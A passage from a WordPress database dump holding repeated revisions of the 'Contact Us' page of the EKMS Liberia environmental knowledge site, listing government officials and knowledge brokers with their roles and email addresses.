/>Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-22 10:35:17','2021-01-22 10:35:17','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3414,42,'2021-01-22 10:41:06','2021-01-22 10:41:06','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><strong>John K. Jallah</strong>\n<p>Manager, ESIA </br>\nDepartment of Compliance and Enforcement </br>\nEPA<p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Konikay Nimely</strong>\n<p>EIA Manager </br>FDA </br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong>\n<p>Marketing and Forest Forecast \n</br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><p><strong>Blamah Goll</strong><br />Conservation Manager FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong><br />Director <br />MOA <br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><strong>Uriah Garsinii </strong>\nLand Use Management Manager </br>\nLLA\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-22 10:41:06','2021-01-22 10:41:06','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3415,42,'2021-01-22 10:41:07','2021-01-22 10:41:07','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><strong>John K. Jallah</strong>\n<p>Manager, ESIA </br>\nDepartment of Compliance and Enforcement </br>\nEPA<p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Konikay Nimely</strong>\n<p>EIA Manager </br>FDA </br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong>\n<p>Marketing and Forest Forecast \n</br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><p><strong>Blamah Goll</strong><br />Conservation Manager FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong><br />Director <br />MOA <br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><strong>Uriah Garsinii </strong>\nLand Use Management Manager </br>\nLLA\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-22 10:41:07','2021-01-22 10:41:07','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3416,42,'2021-01-22 10:41:07','2021-01-22 10:41:07','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><strong>John K. Jallah</strong>\n<p>Manager, ESIA </br>\nDepartment of Compliance and Enforcement </br>\nEPA<p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Konikay Nimely</strong>\n<p>EIA Manager </br>FDA </br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong>\n<p>Marketing and Forest Forecast \n</br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><p><strong>Blamah Goll</strong><br />Conservation Manager FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong><br />Director <br />MOA <br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										